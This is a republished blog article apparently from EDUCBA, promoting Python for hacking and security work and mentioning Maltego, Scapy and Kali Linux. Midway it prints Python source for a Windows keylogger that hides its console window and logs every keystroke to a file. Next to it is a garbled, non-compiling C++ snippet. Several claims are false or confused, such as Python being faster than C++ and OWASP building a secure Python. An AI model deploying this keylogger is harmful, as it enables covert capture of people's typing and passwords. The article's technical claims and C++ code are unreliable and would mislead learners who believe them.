You are reading the article Gray Hat Python: Security Through Obscurity updated in September 2023 on the website Nhahang12h.com. We hope that the information we have shared is helpful to you. If you find the content interesting and meaningful, please share it with your friends and continue to follow and support us for the latest updates. Suggested October 2023 Gray Hat Python: Security Through Obscurity
Introduction to Gray Hat PythonSo, two years back, I was researching programming languages; I started reading about C, C++, Assembly, Python, and Ruby. I wanted to become an expert in Cyber Security. So, I started learning as much as I could. I started with C, C++, and C# being the basics, and after learning and compiling lots of programs and viruses, I finally started learning Kali Linux. It is an operating system for penetration testing for those who don’t know what Kali Linux is. So, I was going on with my studies, and I saw that most of the programs, viruses, and Trojans were compiled in Python, their base being Ruby.
Today, I will discuss how Python transformed into Gray Hat Python and why it is so extensively useful that even Google and YouTube use it in their database to give as accurate search results as possible.
Start Your Free Software Development Course
Web development, programming languages, Software testing & others
Starting, Python is a high-level programming language, which means its syntaxes are extremely easy to read, even for beginners. If you are new to programming, this would be the language I would suggest you start with. Let me give you an example:
How does it look in Different Programming Languages?Explanation using different programming languages as below:
int main() { printf(“Hello worldn”); return 0; }
This is how it looks in Java
class HelloWorld { public static void main (String args[]) { System.out.println ("Hello World"); } }This is how it looks like in Python(v2.7)
print ("Hello World")Simple? Yes, it is. So, Python was easy to write and understand and very compact. So, you might wonder how this led to Gray Hat Python.
Python vs Gray Hat PythonSo, what exactly is Gray Hat Python? Why is it so different from our normal Python? The thing is, Gray Hat Python is nothing but programs written in Python by Hackers, Network-Stress testers, and Reverse Engineers to create or crack a program. It’s useful to Secure or create security-breaking software. But Gray Hat is useful because it is not beneficial or user software.
It can easily be useful to test the limitations of a secure environment or break into a safe environment. That’s what Gray Hat means. And it’s far easier to do it in Python than in C, C++, or Java. Thus the name Gray Hat Python. A few examples I can think of are:
• Writing an Automated IDS (Intrusion Detection System for Security Engineers)
You may have heard of Google App Engine. Google App Engine was originally designed in Python before it was ported on. Google App is a good example of a program written in Python because it allows building web applications using its high-end rich collection of libraries, tools, and framework.
Have you ever wondered why searching for something on Google is so easy? Most of the time, you get search results that are 80% accurate. This is because Python is extremely flexible, works at high speed, and the databases are much more compact though it stores ‘n’ number of information. Python is so extensible that even YouTube uses it for purposes like viewing the video, controlling templates, administering videos, accessing canonical data, and many more.
Google has its crawlers and spiders, which gather data as soon as it is uploaded on the web, no matter where or how secure it is. One just needs proper inspiration, time, and knowledge to gather this information.
Google searches were previously based on Python, which later changed to C++ for speed optimization because Google crawlers crawl many pages per second, and each takes a few minutes to crawl successfully. Python, at present, is much faster than C++, but that wasn’t the same case a few decades ago.
Google quoted a famous quote: –
“Python where we can, C++ where we must.”
So, you might be wondering how this can be useful for Hacking, Pentesting, and Network Security. I beg to differ. Suppose you could create a program that is 70%-80% accurate in giving efficient search results. In that case, you can probably build an application that can connect websites, search smartly and build a person’s profile, which Individual Black Hats can rather use for malicious purposes. Leave Individuals aside; one is smart enough and can easily create an application for building a company’s profile, its whole tree from its root to whatever you can think of…
Information Gathering via MaltegoYou may be thinking that I am exaggerating a bit. Nope, I am NOT!
One just needs to enter pertinent data into the app, and the rest of the things, like linking emails, people, groups of people, and even determining internet infrastructures such as Domains, DNS names, Netblocks, and IP addresses, can be connected and interconnected using this open-source intelligence.
For more information, visit to know What is Maltego?
So, if access to “Secret information” determines your success, then Maltego can help you discover it. Maltego is partially written in Python and uses Java, which is a great language.
So much to quote about security from Google. To be more precise, Google is the least way to keep yourself anonymous on the web. It doesn’t matter whether you use incognito or chúng tôi from Chrome. Because, ultimately, everything is updated on the web. The point here is it’s not about invulnerability; it’s about being vulnerable. One cannot completely wipe oneself off the Internet. But one can keep as little info on the Web as possible.
Python is not just a language; it’s a scripting language. Scripting languages allow you to write and modify your tools when you need something more custom. These Network Security tools depend on scripting language heavily for extensibility. For Example, let’s Take Scapy.
Scapy is purely written in Python. It is a powerful interactive packet manipulation tool. It can generate fake packets, scan networks, and even sniff packets.
Find detailed information about What is Scapy?
How has keylogger written in Python?Following is a code for a keylogger written in Python:
#!/usr/bin/Python import pyHook import Pythoncom import win32gui import win32console log_file = "log_file.txt" #name of log file window = win32console. GetConsoleWindow() #go to script window win32gui.ShowWindow (window,0) #hide window def pressed_chars(event): #on key pressed function if event.Ascii: f = open(log_file,"a") # (open log_file in append mode) char = chr (event.Ascii) # (insert real char in variable) if char == "q": # (if char is q) f.close() # (close and save log file) exit() # (exit program) if event.Ascii == 13: # (if char is "return") f.write("n") # (new line) f.write(char) # (write char) proc = pyHook.HookManager() #open pyHook proc.KeyDown = pressed_chars #set pressed_chars function on KeyDown event proc.HookKeyboard() #start the function Pythoncom.PumpMessages() #get inputint main(int argc, char ** agrv){ using namepace std; /*Easier*/ char std::vector input_STRUCT = [“S”, “T”, “O”]; char std::vector input_STRUCT_1 = [“P”, “”]; char std::vector input_STRUCT_2 = [“L”, “O”, “O”, “K”, “I”, “N”, “G”]; char std::vector input_STRUCT_3 = [“”, “F”, “O”, “R”]; char std::vector input_STRUCT_4 = [“M”, “A”, “L”, “W”]; char std::vector input_STRUCT_5 = [“A”, “R”, “E”]; ostream os(“C:userskeylogger.txt”); int i; for( i = 0; i <=2; i++){ os << input_STRUCT[i]; for(;i <= 1000000 ;i++){ } } for( i=0; i<=1;i++){ os << input_STRING_1[i]; for(;i <= 1000000 ;i++){ } } for(i=0; i<=6; i++) { os << input_STRING_2 [i]; for(; i <= 1000000 ; i++){ } for(i=0; i<=3;i++){ os << input_STRING_3[i]; for(; i <= 1000000 ;i++){ } } for(i=0; i<=3; i++){ os << input_STRING_4[i]; for(;i <= 1000000 ; i++){ } } for(i=0; i<=2; i++){ os << input_STRING_5[i]; for(;i <= 1000000 ; i++){ } } os.close(); istream is (” C:userskeylogger.txt “); cout << is; return 0; }
So, this is pretty large as compared to Python. And if we talk about efficiency, then Python can be easily compiled into an executable without any effort using py2exe software. Whereas if I talk about C++, then, frankly speaking, this code is a joke. Besides, this code is far from easy for a beginner to understand. To write a proper key logger, one must write a DLL that implements the WH_KEYBOARD hook.
Open Source HackingNow, this takes care of Black Hat hackers, which, to be more precise, are the people who intend to destroy and manipulate data for their own needs. Regarding security concerns, Python is also useful for White Hat hackers who intend to save society from malicious hackers’ attacks. If you want to develop a career or at least want to learn Python for security research, then you can surely get in deep with OWASP, BRO, or Quick NIX Secure Script.
OWASP is an Open Web Application Security Project. OWASP aims to create a more secure version of Python that makes it easier for security professionals and developers to write software less prone to hackers’ attacks. It is related to Black-Box analysis, identifying and addressing security-related issues that can affect Python’s interactive interpreter.
BRO is a network security and traffic monitor program, whereas Quick NIX is useful to harden and secure file ownership on the fly.
Since we are speaking of Security, let’s talk about an operating system partially based on Python. Python works great with UNIX, LINUX and Debian. One of the most famous operating systems was Backtrack 5. There were different versions. It was specifically for PenTesting. Later on, the people at Offensive Security thought that Backtrack needed a reboot ‘cause most of the tools were either not working properly or were not supported.
Later, they released Kali Linux, which was based on Debian. And most of its framework is either in Ruby or Python. Ruby, too is an awesome scripting language. But I would always prefer Python over that because Python has a more diverse community with Linux, and it’s more direct and easy to debug. Whereas Ruby has many features and quickly adapts to its surrounding environment, it can be hard to debug and read and more sophisticated than Python.
The best example would be comparing Apple vs Linux or iPhone vs Android. Apple is rich in resources, extremely smooth, and more biased toward beginners. Whereas Linux/Android is more User-friendly, a bit laggy, and can be a headache sometimes if you don’t know how to configure or maintain it.
Justin Seitz even has a book based on Python Gray Hat Hacking. It deals specifically with automating tedious reverse engineering and security-related tasks, designing your own debugger, library, and DLL injection, sniffing secure traffic over an encrypted session, and using Immunity debugger, Sulley, and many more. It’s an awesome book; it doesn’t matter whether you are a beginner or an expert; you will always learn something or other things every time you read it.
ConclusionSo, if you are a beginner, Python would be the right choice for you to start with as your first programming security testing language.
Just remember one thing in the end: Gray Hat Python is not just a language; it’s a way to do things properly and quickly.
Related ArticlesWe hope that this EDUCBA information on “Gray Hat Python” was beneficial to you. You can view EDUCBA’s recommended articles for more information.
You're reading Gray Hat Python: Security Through Obscurity
Update the detailed information about Gray Hat Python: Security Through Obscurity on the Nhahang12h.com website. We hope the article's content will meet your needs, and we will regularly update the information to provide you with the fastest and most accurate information. Have a great day!